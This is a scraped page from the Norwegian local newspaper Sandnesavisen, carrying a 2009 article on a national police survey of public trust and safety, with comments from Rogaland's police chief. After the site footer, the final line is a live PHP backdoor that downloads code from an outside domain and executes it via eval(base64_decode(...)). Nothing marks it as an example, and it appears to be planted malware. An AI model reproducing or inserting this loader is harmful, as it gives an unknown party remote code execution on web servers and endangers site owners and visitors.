GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
24. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Publikum - det er trygt
Skrevet av Trond Stava   
onsdag 21. januar 2009

Tilliten hos publikum er avgjørende for at vi skal bekjempe kriminalitet og skape trygghet, lov og orden. Det er noe vi ikke må miste, sier politimester Geir Gudmundsen i en kommentar til den nye store publikumsundersøkelsen TNS Gallup har gjort for politiet.

Undersøkelsen er landsomfattende, men sier også en del om det enkelte politidistrikt. I tillegg til høy tillit er det hele 93 prosent som sier at de føler seg trygge der de bor og ferdes. Dette stemmer også for Rogaland politidistrikt som ligger på landsgjennomsnittet med over 90 prosent som har oppgitt at de føler seg trygge.
- Dette er meget hyggelige tall, og det viser akkurat det vi påpekte i forbindelse med fremleggelsene av statistikken for kriminalitetsutviklingen i Rogaland politidistrikt for 2008 at også vi har et meget trygt politidistrikt, sier Gudmundsen.

Likevel påpeker politimesteren at det langt fra alt i den landsomfattende undersøkelsen som er like hyggelig lesning. På grunn av at tallene for hvert enkelt politidistrikt er små  er det vanskelig å bruke tallene for Rogaland konkret.

- Vi ligger i de fleste spørsmålene midt på treet, på noen spørsmål noe over, eller noe under landsgjennomsnittet. Det vi derfor kan si er at vi som resten av politi-Norge har som utfordring tilstedeværelse i forhold til det som gjelder tyveri, innbrudd og hærverk. På dette området er det hele 53 prosent av publikum som ikke er fornøyd, sier Gudmundsen som legger til at Rogaland politidistrikt gjennom hele 2008 hadde et spesielt fokus på vinningsforbrytelser.

- Vi hadde en positiv utvikling på vinningsforbrytelser i 2008, med en nedgang på 15,6 % sammenlignet med 2007.

Politimesteren trekker spesielt frem det målrettede arbeidet med gjengangere i politidistriktet som en viktig medvirkende faktor til den positive utviklingen innenfor vinningsforbrytelser.

Jobb å gjøre

Gudmundsen mener også at den store undersøkelsen klart kan leses på flere måter. Selv velger han å se den med kritiske publikumsøyne.

- Vi kan selvsagt velge å juble over at seks av ti nordmenn mener politiet gjør en god jobb innen områdene narkotika, forebyggende arbeid, organisert kriminalitet, ran, vold, sedelighet og vår egen informasjon ut til publikum. Det vi da glemmer er at fire av ti er av motsatt oppfatning, og det er alvorlig.

Publikumsundersøkelsen viser at flere av de som har hatt kontakt med politiet gir tilbakemeldinger om at de er misfornøyde med måten de er blitt møtt på og fulgt opp.

- Vi skal ta publikum på alvor. Lytte til hva de har å si, og kommunisere tilbakemeldinger på en skikkelig måte både når publikum tar kontakt og ved en eventuell oppfølging i ettertid.  Vi skal arbeide videre med å finne ut hva vi kan forbedre og jobbe for å redusere antallet misfornøyde til neste gang politiet gjennomfører en slik omfattende og viktig undersøkelse, sier politimesteren

Gudmundsen sier at han ser for seg at i Rogaland politidistrikt skal vi ikke bare studere tallene i undersøkelsen.

- Vi skal bruke undersøkelsen aktivt som et arbeidsredskap da dette er den mest klare meldingen vi har fått tilbake fra publikum siden den forrige undersøkelsen i 2006, sier politimesteren.

Publikumsundersøkelsen gir politiet økt kunnskap til å jobbe målrettet, til å utforme tiltak og finne forbedringsområdet slik at politiet kommer publikum i møte på en best mulig måte.

-  Men for å klare å lykkes må vi øke bemanningen og se på den totale ressurssituasjonen, sier Gudmundsen og avslutter med å si at bemanningsrapporten "Politiet mot 2020" (Politidirektoratet 2008) viser at det er behov for både flere politiutdannede og flere sivilt ansatte frem mot 2020, i tillegg til at politiet må styrke budsjettene for å møte utfordringene fremover.

 

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));